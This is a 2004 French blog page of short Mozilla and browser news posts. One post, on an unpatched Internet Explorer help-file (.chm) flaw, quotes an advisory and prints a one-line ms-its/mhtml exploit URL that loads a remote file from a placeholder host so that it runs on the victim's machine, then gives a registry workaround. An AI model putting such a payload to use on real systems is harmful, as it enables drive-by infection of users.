BlogZiNet

Aller au contenu | Aller au menu | Aller à la recherche | Mozinet

samedi 28 février 2004

CB Mozilla Optimizer 1.5

Le site Materiel.be présente un utilitaire pour les navigateurs Mozilla (la suite Internet aussi bien que Firefox) d'origine allemande : CB Mozilla Optimizer. L'information a été reprise par Génération NT. Pourtant, contrairement à ce qu'affirme Materiel.be, l'application de Computer Base ne réduit pas le temps du « premier lancement du navigateur ». Pour cela, à la manière de composants d'Internet Explorer qui sont lancés en même temps que Windows, il est possible de précharger Mozilla au démarrage du système. Une icône dans la systray permettra de le lancer à la main rapidement en cas de besoin ou sur demande d'un autre programme.

Lire la suite

jeudi 26 février 2004

Des fonds d'écran Firefox pour toutes les résolutions

Enfin, peut-être pas toutes, mais au moins les principales : 800x600, 1024x768, 1280x1024, 1600x1200. C'est Jon Hicks le designer de la nouvelle icône de Firefox pour Mozilla qui les propose.

hicksdesign : firefox resources : Firefox wallpaper, John Hicks

MozillaZine-fr, Des fonds d'écran de Mozilla Firefox fournis par le créateur de l'icône de Firefox, 25 fév. 2004, traduction de l'article original de MozillaZine US

MyIE 0.9.17

Ldfa qui a toujours de petits problèmes d'hébergement propose la version française de MyIE 0.9.17 qui vient juste de sortir. Au menu :

Lire la suite

mercredi 25 février 2004

Mozilla 1.7a encore plus rapide

Le nouveau millésime de la suite Internet de la fondation Mozilla peut être téléchargé. Il s'agit de la version 1.7 en fin de première phase du cycle de développement. Les notes de diffusions relookées, avec une liste des nouveautés organisées par catégorie, annoncent des performances à la hausse. La version 1.6 avait déjà offert des temps de chargement des pages en baisse de 6 à 8 pour cent. Mozilla 1.7a affiche lui des temps de chargement des pages en baisse de 4 % par rapport à la version 1.6. Autre chose appréciable, la taille des fichiers d'installation est en baisse de 2 % toujours par rapport à la version 1.6.

La liste des bogues corrigés est impressionnante et contient à l'heure actuelle 875 questions traitées (la notion de bogue dans Bugzilla dépasse largement celle de dysfonctionnement du logiciel). Les nouveautés du navigateur sont à chercher du côté du blocage des pop-up. Deux préférences qui n'ont pas encore d'implémentation dans l'interface permettent d'affiner l'outil pourtant déjà très performant. Il s'agit de dom.popup_maximum et de dom.popup_allowed_events. La fonction bloque une plus grande sorte de pop-up (essentiellement les mouseover pop-ups) et un site ne peut pas ouvrir plus de 20 pop-ups à la fois même si le blocage des pop-ups n'est pas activé. Certains sites ordonnent l'ouverture de centaines de fenêtres qui arrivent vite à faire planter les navigateurs (voire le système). A l'opposé, cette version 1.7a a maintenant une commande pour ouvrir les fenêtres bloquées. L'interface dispose maintenant d'une nouvelle option pour activer le Smooth Scrolling (Preferences > Appearance). Un bogue fréquemment rapporté a été résolu : les fichiers téléchargés sont désormais déplacés dans le répertoire cible dès que la destination est choisie.

Comme dans le dernier Thunderbird, il est maintenant possible de définir plusieurs identités pour un seul compte. Il n'y a pas encore de commandes d'interface pour les associer. Il est pourtant possible d'exploiter cette nouvelles fonctionnalités en personnalisant les préférences utilisateurs ( user_pref("mail.account.account##.identities", "id1,id#");). Une amélioration qui va faciliter la copie ou le transfert des profils sans qu'il ne soit plus besoin de reprendre les entrées du fichier prefs.js, c'est la prise en charge par Mozilla des chemins relatifs pour les dossiers mail dans ce fichier prefs.js. Mozilla 1.7a permet désormais d'éditer les listes d'adresses contenant des identités du style « Nom, Prénom ». Maintenant, dans la fenêtre de composition des courriels, il est possible de se déplacer dans la liste A/CC/CCi (To/CC/Bcc) avec les touches de flèches haut et bas. Plus spécifiquement, sur Mac OS X, les noms des fichiers joints ne sont plus affichés en Unicode décomposé mais sont convertis en Unicode composé.

Le client IRC, ChatZilla, est passé à la version 0.9.59 qui comprend notamment désormais le support de l'instruction /ignore, le changement des polices et tailles de caractères, la personnalisation des sons sous Windows et Linux et des améliorations de l'interface pour le mode half-op.

D'autres améliorations cachées sont à noter comme le support de l'événement onBeforeUnload qui est appelé à rendre service aux développeurs d'applications Web en particulier. Son utilisation ira sans aucun doute au-delà de l'alerte de l'utilisateur d'une application web du risque de perte de données lors de sa fermeture ou dans le cas de celui qui quitte une page HTML contenant des informations sensibles. Consultez les notes de diffusion pour toutes les nouveautés.

Vous pouvez téléchager Mozilla 1.7 sur le FTP de Mozilla.org pour Linux, Mac OS X, Solaris et Windows. Pour ce dernier système, sont disponibles une version complète avec installeur (11,8 Mo), le gestionnaire d'installation (235 Ko) qui permet de ne télécharger que les composants sélectionnés et une version ZIP (10,6 Mo).

Mozilla.org (en anglais) :

lundi 23 février 2004

Nouvelle version 0.8 de Dillo pour Linux

Dillo est un navigateur graphique léger pour systèmes UNIX complètement écrit en C et principalement basé sur GTK+ (sans que GNOME soit requis). Dillo est développé en open source sous licence GNU GPL depuis quatre ans. Le code actuel utilise le moteur HTML Gzilla 0.2.2 (projet mort). Il est très petit (les sources font moins de 400 Ko et le binaire autour de 350 Ko). Dillo se dit rapide et vise à obtenir un navigateur multi-plateformes léger, stable, pratique et extensible. Même si Dillo n'a pas été écrit pour les systèmes nomades, sa petite taille le désigne pour ces environnements. Il exige moins de mémoire que Lynx au démarrage et ses faibles exigences en performances processeur lui permettent de tourner à peu près sur un Pentium 75 MHz, un ARM (Psion) 37 MHz ou un 25 MHz 486 avec 8 Mo de RAM.

Lire la suite

Titanetscape !

Daniel Glazman qui a présenté son éditeur HTML autonome basé sur Composer de Mozilla, Nvu, au FOSDEM 2004 de Bruxelles, ce week-end signale que Gervase Markham de la fondation Mozilla a fait un tabac avec sa gravure allégorique de la séparation de Mozilla de Netscape/AOL. Pour lui la fondation est un canot de survie…

Lire la suite

jeudi 19 février 2004

Vulnérabilité critique IE non patchée

Après la vulnérabilité non critique d'IE 5 découverte grâce aux sources volées, en voici une critique, non patchée concernant aussi Internet Explorer 6. Une simple page HTML suffirait à un attaquant pour télécharger puis exécuter, sur la machine vulnérable, un fichier malicieux. Selon la liste K-Otik :

Cette faille se situe au niveau du traitement des fichiers d'aide .chm, elle est actuellement exploitée par un trojan « Ibiza.A » qui s'installe automatiquement sur une machine vulnérable sans même l'intervention de l'utilisateur (sur simple visite d'une page HTML malicieuse).

ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

La solution préconisée est de renommer l'entrée dans le registre : HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its. Il est quand même plus simple, plus sûr et plus agréable de ne plus utiliser Internet Explorer.

Les sources volées commencent à révéler les failles de Windows et d'IE

Les craintes exprimée lors de l'annonce du vol d'une petite partie code source de Windows 2000 et NT4 (qui servent de base à Windows XP et Server 2003) sont entrain de se concrétiser. Selon le JDNet :

Une première faille – non considérée comme critique – vient d'être découverte grâce à la diffusion de ces portions de code : elle concerne Internet Explorer 5 et permet, grâce à un simple fichier bitmap d'exécuter du code malicieux.

Comme quoi les vols de propriété intellectuelle peuvent être dangereux. Au lieu de se poser en victime Microsoft ferait bien de publier officiellement cette partie du code volée pour débuter. Jamais Microsoft n'aurait pu laisser subsister si longtemps du code vulnérable avec un code source exposé au regard des spécialistes en sécurité et des clients compétents utilisant ses produits. Les développeurs utilisant de telles applications comme base de leur création auraient été parmi les plus vigilants à exiger des produits solides et sûres. La transparence aurait obligé Microsoft à réagir. On comprend mieux son hostilité au modèle open source.

JDNet, Fébrilité dans le monde de la sécurité, 19 fév. 2004, Fabrice Deblock

RSS Reader Panel pour Firefox

Un article en français de LinuxÉdu-Québec de Pascal Lapalme présente l'extension pour Firefox, RSS Reader Panel, qui permet de consulter les fils RSS (des exemples sur cette page). Les agrégateurs RSS-XML offre une nouvelle façon de consulter les news et de se tenir au courant des mises à jour des sites Web.

RSS Reader Panel est garanti pour Firefox 0.8. Un autre lecteur de news existe pour Firefox et la suite Internet mais n'a pas évolué depuis Firebird 0.5. Il s'agit d'Aggreg8 en version 0.0.1. J'ai essayé NewsMonster (1.2.2 version Pro gratuite) pour la suite Internet Mozilla et Netscape 7 qui est très lourd. Je l'ai désinstallé devant la consommation de ressources système et l'incompatibilité avec d'autres extensions qui me sont bien plus utiles.

LinuxÉdu-Québec, Mozilla Firebird et les fils RSS, 25 janv. 2004, Pascal Lapalme

RSS Reader Panel,v.1.68 et v.1.7 (10/02/2004)

Aggreg8 v 0.0.1 Philip Roche

NewsMonster 1.2.2 final version Pro gratuite

mardi 17 février 2004

Mozilla s'organise en Europe

Semble-t-il après de longues négociations avec la fondation Mozilla basée à Montain View en Californie, le parisien Tristan Nitot lance Mozilla Europe. C'est aujourd'hui que l'annonce en est faite. Il s'agit de regrouper les effort du vieux continent en faveur du projet Mozilla. Les statuts de l'association en définissent la mission : « la promotion, l'aide au déploiement et le développement du logiciel libre Mozilla et de ses dérivés (et projets connexes) en Europe. »

Lire la suite